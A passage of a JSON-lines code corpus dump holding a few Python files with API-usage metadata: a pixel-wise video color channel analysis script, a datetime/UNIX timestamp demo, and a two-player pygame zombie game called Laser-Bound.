"attribute"}, {"api_name": "wx.EVT_MENU", "line_number": 119, "usage_type": "call"}, {"api_name": "wx.ID_FILE3", "line_number": 119, "usage_type": "attribute"}, {"api_name": "wx.EVT_MENU", "line_number": 120, "usage_type": "call"}, {"api_name": "wx.ID_FILE4", "line_number": 120, "usage_type": "attribute"}, {"api_name": "wx.EVT_MENU", "line_number": 121, "usage_type": "call"}, {"api_name": "wx.ID_FILE5", "line_number": 121, "usage_type": "attribute"}, {"api_name": "wx.EVT_MENU", "line_number": 122, "usage_type": 
"call"}, {"api_name": "wx.EVT_MENU", "line_number": 123, "usage_type": "call"}, {"api_name": "wx.EVT_MENU", "line_number": 124, "usage_type": "call"}, {"api_name": "wx.EVT_MENU", "line_number": 125, "usage_type": "call"}, {"api_name": "wx.Panel", "line_number": 129, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 130, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 130, "usage_type": "attribute"}, {"api_name": "wx.Panel", "line_number": 135, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 136, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 136, "usage_type": "attribute"}, {"api_name": "wx.StaticBoxSizer", "line_number": 137, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 137, "usage_type": "attribute"}, {"api_name": "wx.ListBox", "line_number": 140, "usage_type": "call"}, {"api_name": "wx.Button", "line_number": 141, "usage_type": "call"}, {"api_name": "wx.EVT_BUTTON", "line_number": 142, "usage_type": "call"}, {"api_name": "wx.EXPAND", "line_number": 144, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 145, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_RIGHT", "line_number": 145, "usage_type": "attribute"}, {"api_name": "wx.Panel", "line_number": 149, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 150, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 150, "usage_type": "attribute"}, {"api_name": "wx.StaticBoxSizer", "line_number": 151, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 151, "usage_type": "attribute"}, {"api_name": "wx.Panel", "line_number": 156, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 157, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 157, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 160, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 160, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 161, "usage_type": "call"}, {"api_name": "wx.EVT_BUTTON", "line_number": 162, "usage_type": "call"}, {"api_name": "wx.TOP", "line_number": 164, "usage_type": "attribute"}, {"api_name": "wx.BOTTOM", "line_number": 164, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 164, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 165, "usage_type": "attribute"}, {"api_name": "wx.BOTTOM", "line_number": 165, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 167, "usage_type": "attribute"}, {"api_name": "wx.Panel", "line_number": 171, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 172, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 172, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 175, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 175, "usage_type": "attribute"}, {"api_name": "wx.Choice", "line_number": 177, "usage_type": "call"}, {"api_name": "wx.EVT_CHOICE", "line_number": 181, "usage_type": "call"}, {"api_name": "wx.TOP", "line_number": 183, "usage_type": "attribute"}, {"api_name": "wx.BOTTOM", "line_number": 183, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 184, "usage_type": "attribute"}, {"api_name": "wx.BOTTOM", "line_number": 184, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 186, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 186, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 190, "usage_type": 
"attribute"}, {"api_name": "wx.EXPAND", "line_number": 190, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 191, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 191, "usage_type": "attribute"}, {"api_name": "wx.NOT_FOUND", "line_number": 198, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 215, "usage_type": "call"}, {"api_name": "os.path", "line_number": 215, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 216, "usage_type": "call"}, {"api_name": "os.path", "line_number": 216, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 225, "usage_type": "call"}, {"api_name": "os.path", "line_number": 225, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 232, "usage_type": "call"}, {"api_name": "os.path", "line_number": 232, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 233, "usage_type": "call"}, {"api_name": "os.path", "line_number": 233, "usage_type": "attribute"}, {"api_name": "wx.MessageDialog", "line_number": 236, "usage_type": "call"}, {"api_name": "wx.ICON_QUESTION", "line_number": 237, "usage_type": "attribute"}, {"api_name": "wx.YES_NO", "line_number": 237, "usage_type": "attribute"}, {"api_name": "wx.NO_DEFAULT", "line_number": 237, "usage_type": "attribute"}, {"api_name": "wx.ID_YES", "line_number": 238, "usage_type": "attribute"}, {"api_name": "wx.AboutDialogInfo", "line_number": 275, "usage_type": "call"}, {"api_name": "wx.AboutBox", "line_number": 280, "usage_type": "call"}, {"api_name": "wx.LaunchDefaultBrowser", "line_number": 284, "usage_type": "call"}, {"api_name": "wx.LaunchDefaultBrowser", "line_number": 288, "usage_type": "call"}, {"api_name": "project.Project", "line_number": 293, "usage_type": "call"}, {"api_name": "wx.FileDialog", "line_number": 303, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 303, "usage_type": "call"}, {"api_name": "wx.OPEN", "line_number": 305, "usage_type": "attribute"}, {"api_name": "wx.FD_CHANGE_DIR", "line_number": 305, "usage_type": "attribute"}, {"api_name": "wx.ID_OK", "line_number": 307, "usage_type": "attribute"}, {"api_name": "wx.ID_FILE1", "line_number": 315, "usage_type": "attribute"}, {"api_name": "wx.ID_FILE2", "line_number": 317, "usage_type": "attribute"}, {"api_name": "wx.ID_FILE3", "line_number": 319, "usage_type": "attribute"}, {"api_name": "wx.ID_FILE4", "line_number": 321, "usage_type": "attribute"}, {"api_name": "wx.ID_FILE5", "line_number": 323, "usage_type": "attribute"}, {"api_name": "project.Project", "line_number": 331, "usage_type": "call"}, {"api_name": "wx.MessageBox", "line_number": 334, "usage_type": "call"}, {"api_name": "wx.ICON_ERROR", "line_number": 336, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 348, "usage_type": "call"}, {"api_name": "os.path", "line_number": 348, "usage_type": "attribute"}, {"api_name": "sys.exc_info", "line_number": 355, "usage_type": "call"}, {"api_name": "wx.MessageDialog", "line_number": 359, "usage_type": "call"}, {"api_name": "wx.OK", "line_number": 359, "usage_type": "attribute"}, {"api_name": "wx.ICON_ERROR", "line_number": 359, "usage_type": "attribute"}, {"api_name": "wx.FileDialog", "line_number": 364, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 364, "usage_type": "call"}, {"api_name": "wx.SAVE", "line_number": 366, "usage_type": "attribute"}, {"api_name": "wx.FD_OVERWRITE_PROMPT", "line_number": 366, "usage_type": "attribute"}, {"api_name": 
"wx.FD_CHANGE_DIR", "line_number": 366, "usage_type": "attribute"}, {"api_name": "wx.ID_OK", "line_number": 368, "usage_type": "attribute"}, {"api_name": "wx.FileDialog", "line_number": 394, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 394, "usage_type": "call"}, {"api_name": "wx.OPEN", "line_number": 395, "usage_type": "attribute"}, {"api_name": "wx.FD_CHANGE_DIR", "line_number": 395, "usage_type": "attribute"}, {"api_name": "wx.ID_OK", "line_number": 397, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 400, "usage_type": "call"}, {"api_name": "os.path", "line_number": 400, "usage_type": "attribute"}, {"api_name": "wx.FileDialog", "line_number": 420, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 420, "usage_type": "call"}, {"api_name": "wx.SAVE", "line_number": 422, "usage_type": "attribute"}, {"api_name": "wx.FD_OVERWRITE_PROMPT", "line_number": 422, "usage_type": "attribute"}, {"api_name": "wx.FD_CHANGE_DIR", "line_number": 422, "usage_type": "attribute"}, {"api_name": "wx.ID_OK", "line_number": 424, "usage_type": "attribute"}, {"api_name": "urllib.pathname2url", "line_number": 445, "usage_type": "call"}, {"api_name": "wx.LaunchDefaultBrowser", "line_number": 447, "usage_type": "call"}]}
+{"seq_id": "34184206592", "text": "import cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pickle\nfrom tqdm import tqdm\n\nclass channel_visualizer():\n def __init__(self, input_video_path, outpath, colorspace = 'ycrbr', win_size=60, plot_W = 640, plot_H = 480):\n self.win_size = win_size\n self.plot_W = plot_W\n self.plot_H = plot_H\n \n try:\n self.input_capture = cv2.VideoCapture(input_video_path)\n except:\n raise ValueError('Input video path %s not valid' % input_video_path)\n \n if self.input_capture is not None: \n self.tot_input_vid_frames = int(self.input_capture.get(cv2.CAP_PROP_FRAME_COUNT)) \n self.input_cap_fps = int(self.input_capture.get(cv2.CAP_PROP_FPS))\n self.W , self.H = int(self.input_capture.get(3)), int(self.input_capture.get(4)) #input video dimensions\n else:\n raise ValueError(\"Invalid input video\")\n \n self.chan1 = []\n self.chan2 = []\n self.chan3 = []\n\n self.chan12 = []\n self.chan13 = []\n self.chan23 = []\n\n self.num_pixels = self.W * self.H\n for i in range(self.num_pixels):\n self.chan1.append([])\n self.chan2.append([])\n self.chan3.append([])\n self.chan12.append([])\n self.chan23.append([])\n self.chan13.append([])\n\n self.colorspace = colorspace\n if colorspace == 'ycrbr':\n self.chan1_name = 'Y'\n self.chan2_name = 'Cr'\n self.chan3_name = 'Br'\n print('YCrBr analysis')\n elif colorspace == 'bgr':\n self.chan1_name = 'B'\n self.chan2_name = 'G'\n self.chan3_name = 'R'\n\n self.frame_num = 0\n\n self.outpath = outpath\n self.input_vid_name = 'mp_' + input_video_path.split('/')[-1][:-4]\n \n \n def run(self):\n \"\"\"\n process the input video!\n \"\"\"\n\n #generate data\n with tqdm(total=self.tot_input_vid_frames) as pbar:\n pbar.set_description('Generating color channel visualization data')\n while self.input_capture.isOpened():\n ret, frame = self.input_capture.read()\n if ret:\n self.frame_num += 1\n if self.chan1_name == 'Y':\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2YCR_CB)\n for i in range(self.num_pixels):\n r = int(i / self.W)\n c = i % self.W\n self.chan1[i].append(frame[r, c, 0])\n self.chan2[i].append(frame[r, c, 1])\n self.chan3[i].append(frame[r, c, 2])\n self.chan12[i].append(frame[r, c, 0] / frame[r, c, 1])\n self.chan13[i].append(frame[r, c, 0] / frame[r, c, 2])\n self.chan23[i].append(frame[r, c, 1] / frame[r, c, 2])\n else:\n break\n pbar.update(1)\n for i in range(900):\n print(self.chan1[i][10])\n #save all data\n with open(f'{self.outpath}/{self.colorspace}_{self.input_vid_name}_pixelwise_channel_data.pkl','wb') as f:\n data_dict = {\n 'chan1':self.chan1, \n 'chan2':self.chan2, \n 'chan3':self.chan3, \n 'chan12':self.chan12,\n 'chan13':self.chan13,\n 'chan23':self.chan23,\n }\n pickle.dump(data_dict, f)\n\n ", "repo_name": "Hadleigh-Schwartz/deepfake_detection", "sub_path": "evm_experiments/vis_channels_pixelwise.py", "file_name": "vis_channels_pixelwise.py", "file_ext": "py", "file_size_in_byte": 3551, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "cv2.VideoCapture", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.CAP_PROP_FRAME_COUNT", "line_number": 19, "usage_type": "attribute"}, {"api_name": "cv2.CAP_PROP_FPS", "line_number": 20, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 65, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 72, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2YCR_CB", "line_number": 72, "usage_type": "attribute"}, {"api_name": "pickle.dump", 
"line_number": 97, "usage_type": "call"}]}
+{"seq_id": "6654316188", "text": "# importing datetime module\n\nimport datetime\nimport time\nfrom datetime import timedelta\n\n#### display the current time in UNIX format\n\n# assigned regular string date\ndate_time = datetime.datetime(2023, 1, 26, 15, 20)\n \n # print regular python date&time\nprint(\"date_time =>\",date_time)\n\n \n# displaying unix timestamp after conversion\nprint(\"unix_timestamp => \",\n (time.mktime(date_time.timetuple())))\n\n#######\n####### calculate the time from today until a given date, outputs the delta\ntime_now = datetime.datetime.now()\npast_date1 = time_now - timedelta(days=189)\nprint(past_date1) \n\n# What day will it be after 180 days\nfuture_date2 = time_now + timedelta(days=189)\nprint(future_date2)\n\n# What day would it have been 150 days ago\npast_date1 = time_now - timedelta(days=189)\nprint(past_date1)\n\n\n\n", "repo_name": "mathiasgrosse/Best_GroupDCI", "sub_path": "unixformat.py", "file_name": "unixformat.py", "file_ext": "py", "file_size_in_byte": 802, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.datetime", "line_number": 10, "usage_type": "call"}, {"api_name": "time.mktime", "line_number": 18, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 22, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 22, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 23, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 27, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 31, "usage_type": "call"}]}
+{"seq_id": "35044616496", "text": "import pygame, sys\nfrom pygame import mixer\nimport random\nimport math\n\npygame.init()\nmixer.init()\npygame.font.init()\n\n# CONSTANTS\nSCREEN_WIDTH = 1000\nSCREEN_HEIGHT = (int)(SCREEN_WIDTH * 0.8)\nBG = (105, 105, 105)\nBG_IMAGE = pygame.image.load('misc/bg_image.jpg')\nWHITE = (255, 255, 255)\nRED = (255, 0, 0)\nFPS = 60\n\n#ICON\nprogramIcon = pygame.image.load('misc/icon.png')\npygame.display.set_icon(programIcon)\n\noriginal_wizard1image = pygame.image.load('good/wizard1.png')\noriginal_wizard2image = pygame.image.load('good/wizard2.png')\noriginal_zombieimage = pygame.image.load('bad/zombie.png')\n\n# MUSIC CONSTANTS\nmain_menu_music = pygame.mixer.Sound('music/main_menu.mp3')\nmain_menu_music.set_volume(1)\n# funny_bit, retro_platforming, castle_of_fear\nmusic = pygame.mixer.Sound('music/funny_bit.mp3')\nmusic.set_volume(0.7)\nlaser_sfx = pygame.mixer.Sound('music/lasersfx.wav')\nlaser_sfx.set_volume(0.5)\n\n# FONT CONSTANTS\nfont_score = pygame.font.Font('misc/8-bit Arcade In.ttf', 100)\nfont = pygame.font.Font('misc/8-bit Arcade In.ttf', 35)\nfont_gameover = pygame.font.Font('misc/8-bit Arcade In.ttf', 200)\n\n# DISPLAY\nscreen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\npygame.display.set_caption(\"Laser-Bound\")\n\n# DEFINE PLAYER ACTION VARIBALES\none_moving_left = False\none_moving_right = False\none_moving_up = False\none_moving_down = False\n\ntwo_moving_left = False\ntwo_moving_right = False\ntwo_moving_up = False\ntwo_moving_down = False\n\n\nclass Character(pygame.sprite.Sprite):\n def __init__(self, number, x, y, scale, speed):\n self.speed = speed\n self.scale = scale\n self.number = number\n\n image = pygame.image.load(f'good/wizard{number}.png').convert_alpha()\n self.image = pygame.transform.scale(image, (int(image.get_width() * scale), int(image.get_height() * scale)))\n self.rect = self.image.get_rect()\n self.rect.center = (x, y)\n\n def move(self, moving_left, moving_right, moving_up, moving_down):\n # promjena x i y koordinate\n dx = 0\n dy = 0\n\n if moving_left:\n if self.rect.left > 0:\n dx = -self.speed\n if moving_right:\n if self.rect.right < SCREEN_WIDTH:\n dx = self.speed\n if moving_up:\n if self.rect.top > 0:\n dy = -self.speed\n if moving_down:\n if self.rect.bottom < SCREEN_HEIGHT:\n dy = self.speed\n\n # update rectangle position\n self.rect.x += dx\n self.rect.y += dy\n\n def draw(self):\n if self.number == '1':\n main = (main1.rect.center)\n secondary = (main2.rect.center)\n else:\n main = (main2.rect.center)\n secondary = (main1.rect.center)\n ang_x, ang_y = secondary[0] - main[0], secondary[1] - main[1]\n angle = (180 / math.pi) * - math.atan2(ang_y, ang_x) - 90\n if self.number == '1':\n self.image = pygame.transform.rotozoom(original_wizard1image, int(angle), self.scale)\n screen.blit(self.image, self.rect)\n else:\n self.image = pygame.transform.rotozoom(original_wizard2image, int(angle), self.scale)\n screen.blit(self.image, self.rect)\n\n\n\nclass Zombie(pygame.sprite.Sprite):\n def __init__(self, x, y, scale, speed):\n pygame.sprite.Sprite.__init__(self, zombie_group)\n self.speed = speed\n self.check = 0\n self.num = random.choice(main)\n self.scale = scale\n\n img = pygame.image.load('bad/zombie.png').convert_alpha()\n self.image = pygame.transform.scale(img, (int(img.get_width() * scale), int(img.get_height() * scale)))\n self.rect = self.image.get_rect()\n self.rect.center = (x, y)\n\n def move(self):\n dx = self.speed\n dy = self.speed\n\n if self.rect.x > self.num.rect.x:\n 
self.rect.x += -dx\n        else:\n            self.rect.x += dx\n\n        if self.rect.y > self.num.rect.y:\n            self.rect.y += -dy\n        else:\n            self.rect.y += dy\n\n        #self.check += 1\n\n        # collision with player\n        if self.rect.colliderect(main1) or self.rect.colliderect(main2):\n            gameover()\n            #pygame.display.quit()\n\n\n    def draw(self):\n        if self.num == main1:\n            main = (self.rect.center)\n            secondary = (main1.rect.center)\n        else:\n            main = (self.rect.center)\n            secondary = (main2.rect.center)\n        ang_x, ang_y = secondary[0] - main[0], secondary[1] - main[1]\n        angle = (180 / math.pi) * -math.atan2(ang_y, ang_x) - 270\n        self.image = pygame.transform.rotozoom(original_zombieimage, int(angle), self.scale)\n        screen.blit(self.image, self.rect)\n\n\ndef draw_bg():\n    screen.fill(BG)\n    screen.blit(BG_IMAGE, (0, 0))\n\ndef draw_tutorial():\n    wasd_blue = pygame.image.load('misc/wasd.png')\n    wasd_red = pygame.image.load('misc/arrowkeys.png')\n    wasd_blue = pygame.transform.scale(wasd_blue, (wasd_blue.get_width() * 0.3, wasd_blue.get_height() * 0.3))\n    wasd_red = pygame.transform.scale(wasd_red, (wasd_red.get_width() * 0.3, wasd_red.get_height() * 0.3))\n    screen.blit(wasd_blue, (main1.rect.centerx - 55, main1.rect.centery - 100))\n    screen.blit(wasd_red, (main2.rect.centerx - 55, main2.rect.centery - 100))\n\ndef distance_point_line(pt, l1, l2):\n    NV = pygame.math.Vector2(l1[1] - l2[1], l2[0] - l1[0])\n    LP = pygame.math.Vector2(l1) # l2 would work too\n    P = pygame.math.Vector2(pt)\n    return abs(\n        NV.normalize().dot(P - LP)) # dot product of the unit normal with P - LP; P - LP is the direction from the line point towards the zombie\n\ndef fade(width, height, button_play, button_exit, logo):\n    fade = pygame.Surface((width, height))\n    fade.fill((0, 0, 0))\n    for alpha in range(300):\n        fade.set_alpha(alpha)\n        draw_bg()\n        screen.blit(button_play, (100, 400))\n        screen.blit(button_exit, (550, 400))\n        screen.blit(logo, (100, 200))\n        screen.blit(fade, (0,0))\n        pygame.display.update()\n        pygame.time.delay(1)\n\ndef gameover():\n    score_text = font_gameover.render(str(getScore()), False, WHITE)\n    highscore_text = font_gameover.render(str(getHighscore()), False, WHITE)\n    gameover_menu = pygame.image.load(\"misc/gameover_img.png\")\n    button_restart = pygame.image.load(\"ui/button_restart.png\")\n    button_restart_hover = pygame.image.load(\"ui/button_restart_hover.png\")\n    button_exit = pygame.image.load(\"ui/button_gameover_exit.png\")\n    button_exit_hover = pygame.image.load(\"ui/button_gameover_exit_hover.png\")\n\n    global click\n\n    screen.blit(gameover_menu, (250, 100))\n    screen.blit(score_text, (335, 365))\n    screen.blit(highscore_text, (570, 365))\n\n    gameover = True\n    while gameover:\n        mx, my = pygame.mouse.get_pos()\n\n        screen.blit(button_restart, (285, 550))\n        button_restart_rect = pygame.Rect(285, 550, 230, 90)\n        if button_restart_rect.collidepoint((mx, my)):\n            screen.blit(button_restart_hover, (285, 550))\n            if click:\n                for zombie in zombie_group:\n                    zombie.kill()\n                gameover = False\n        screen.blit(button_exit, (550, 550))\n        button_exit_rect = pygame.Rect(550, 550, 148, 90)\n        if button_exit_rect.collidepoint((mx, my)):\n            screen.blit(button_exit_hover, (550, 550))\n            if click:\n                pygame.quit()\n                sys.exit()\n        click = False\n\n        for event in pygame.event.get():\n            if event.type == pygame.QUIT:\n                pygame.quit()\n            if event.type == pygame.MOUSEBUTTONDOWN:\n                if event.button == 1:\n                    click = True\n\n        pygame.display.update()\n    music.stop()\n    game()\n\ndef pause():\n    global one_moving_left, one_moving_right, one_moving_up, one_moving_down\n    global two_moving_left, two_moving_right, two_moving_up, 
two_moving_down\n\n    paused_img = pygame.image.load(\"misc/paused_img.png\")\n    screen.blit(paused_img, (0, 0))\n\n    music.set_volume(0.2)\n\n    pause = True\n    while pause:\n        for event in pygame.event.get():\n            if event.type == pygame.QUIT:\n                pygame.quit()\n\n            if event.type == pygame.KEYDOWN:\n                if event.key == pygame.K_ESCAPE:\n                    one_moving_up = False\n                    one_moving_down = False\n                    one_moving_left = False\n                    one_moving_right = False\n                    two_moving_up = False\n                    two_moving_down = False\n                    two_moving_left = False\n                    two_moving_right = False\n                    pause = False\n        pygame.display.update()\n    music.set_volume(1)\n\n# GROUPS\nzombie_group = pygame.sprite.Group()\n\nscore = 0\nhighscore = 0\ndef setScore():\n    global score\n    score += 1\ndef getScore():\n    global score\n    return score\n\ndef getHighscore():\n    global score, highscore\n    if score > highscore:\n        highscore = score\n    return highscore\n\ndef setScoree():\n    global score\n    score = 0\n# ----------------------------------------------------- MAIN ----------------------------------------------------------\n\nclock = pygame.time.Clock()\nclick = False\nmusicB = True\n\n# Character(number, x, y, scale, speed)\nmain1 = Character('1', 400, 400, 1, 3)\nmain2 = Character('2', 600, 400, 1, 3)\nmain = [main1, main2]\n\ndef game():\n    max_zombie_timer = 300\n    zombie_timer = 0 # 5 seconds, since 300/FPS = 5 with FPS = 60\n    score = 0\n    setScoree()\n    tutorial_timer = 300\n\n    global one_moving_left, one_moving_right, one_moving_up, one_moving_down\n    global two_moving_left, two_moving_right, two_moving_up, two_moving_down\n    one_moving_up = False\n    one_moving_down = False\n    one_moving_left = False\n    one_moving_right = False\n    two_moving_up = False\n    two_moving_down = False\n    two_moving_left = False\n    two_moving_right = False\n\n    global main1, main2\n    global main\n    main1 = Character('1', 400, 400, 1, 3)\n    main2 = Character('2', 600, 400, 1, 3)\n    main = [main1, main2]\n\n    first_time = True\n\n    main_menu_music.stop()\n    music.play(-1, 0, 0)\n\n    run = True\n    while run:\n        clock.tick(FPS)\n        draw_bg()\n\n        if first_time:\n            if tutorial_timer > 0:\n                draw_tutorial()\n            if tutorial_timer == 0:\n                first_time = False\n            tutorial_timer -= 1\n\n        score_text = font_score.render(str(score), False, WHITE)\n        screen.blit(score_text, (30, 1))\n\n        main1.draw()\n        main2.draw()\n\n        main1.move(one_moving_left, one_moving_right, one_moving_up, one_moving_down)\n        main2.move(two_moving_left, two_moving_right, two_moving_up, two_moving_down)\n\n        laser = pygame.draw.line(screen, WHITE, (main1.rect.centerx + 12, main1.rect.centery + 10), (main2.rect.centerx - 25, main2.rect.centery + 10), 6)\n\n\n        # Zombie(x, y, scale, speed)\n        if zombie_timer == max_zombie_timer:\n            # enemies spawn 10 px outside the screen edge\n            ran = random.randint(1, 4)\n            if ran == 1:\n                zombie = Zombie((SCREEN_WIDTH + 10), (random.randint(0, SCREEN_HEIGHT)), 0.8, 1)\n            if ran == 2:\n                zombie = Zombie((random.randint(0, SCREEN_WIDTH)), (-10), 0.8, 1)\n            if ran == 3:\n                zombie = Zombie((-10), (random.randint(0, SCREEN_HEIGHT)), 0.8, 1)\n            if ran == 4:\n                zombie = Zombie((random.randint(0, SCREEN_WIDTH)), (SCREEN_HEIGHT + 10), 0.8, 1)\n            zombie_group.add(zombie)\n            max_zombie_timer -= 10\n            zombie_timer = 0\n        zombie_timer += 1\n\n        zombie_group.draw(screen)\n        for zombie in zombie_group:\n            zombie.move()\n            zombie.draw()\n            if laser.collidepoint(zombie.rect.center) and distance_point_line(zombie.rect.center, main1.rect.center,\n                                                                             main2.rect.center) < 10:\n                laser_sfx.play(1, 0, 0)\n                zombie.kill()\n                setScore()\n                score += 1\n\n        # quit\n        for event in 
pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n\n # keyboard presses\n\n if event.type == pygame.KEYDOWN:\n # movement\n if event.key == pygame.K_a:\n one_moving_left = True\n if event.key == pygame.K_d:\n one_moving_right = True\n if event.key == pygame.K_w:\n one_moving_up = True\n if event.key == pygame.K_s:\n one_moving_down = True\n\n if event.key == pygame.K_LEFT:\n two_moving_left = True\n if event.key == pygame.K_RIGHT:\n two_moving_right = True\n if event.key == pygame.K_UP:\n two_moving_up = True\n if event.key == pygame.K_DOWN:\n two_moving_down = True\n\n if event.key == pygame.K_ESCAPE:\n pause()\n\n if event.type == pygame.KEYUP:\n # -movement\n if event.key == pygame.K_a:\n one_moving_left = False\n if event.key == pygame.K_d:\n one_moving_right = False\n if event.key == pygame.K_w:\n one_moving_up = False\n if event.key == pygame.K_s:\n one_moving_down = False\n\n if event.key == pygame.K_LEFT:\n two_moving_left = False\n if event.key == pygame.K_RIGHT:\n two_moving_right = False\n if event.key == pygame.K_UP:\n two_moving_up = False\n if event.key == pygame.K_DOWN:\n two_moving_down = False\n\n pygame.display.update()\n\ndef main_menu():\n main_menu_music.play(-1, 0, 0)\n button_play = pygame.image.load('ui/button_play.png')\n button_play_hover = pygame.image.load('ui/button_play_hover.png')\n button_exit = pygame.image.load('ui/button_exit.png')\n button_exit_hover = pygame.image.load('ui/button_exit_hover.png')\n while True:\n clock.tick(FPS)\n draw_bg()\n global click, musicB\n\n mx, my = pygame.mouse.get_pos()\n\n logo = pygame.image.load('misc/logo.png')\n screen.blit(logo, (100, 200))\n\n screen.blit(button_play, (100, 400))\n button_play_rect = pygame.Rect(100, 400, 350, 100)\n if button_play_rect.collidepoint((mx, my)):\n screen.blit(button_play_hover, (100, 400))\n if click:\n main_menu_music.fadeout(2000)\n fade(SCREEN_WIDTH, SCREEN_HEIGHT, button_play, button_exit, logo)\n game()\n screen.blit(button_exit, (550, 400))\n button_exit_rect = pygame.Rect(550, 400, 350, 100)\n if button_exit_rect.collidepoint((mx, my)):\n screen.blit(button_exit_hover, (550, 400))\n if click:\n pygame.quit()\n sys.exit()\n click = False\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if event.button == 1:\n click = True\n\n pygame.display.update()\n\n\nmain_menu()", "repo_name": "Rijad-Ismailovic/Laser-Bound", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 15487, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pygame.init", "line_number": 6, "usage_type": "call"}, {"api_name": "pygame.mixer.init", "line_number": 7, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 7, "usage_type": "name"}, {"api_name": "pygame.font.init", "line_number": 8, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 8, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 14, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 14, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 20, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pygame.display.set_icon", "line_number": 21, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pygame.image.load", 
"line_number": 23, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 23, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 24, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 24, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 25, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 25, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 28, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 31, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 31, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 33, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 33, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 37, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 37, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 38, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 39, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 39, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 42, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 42, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 43, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 43, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 57, "usage_type": "attribute"}, {"api_name": 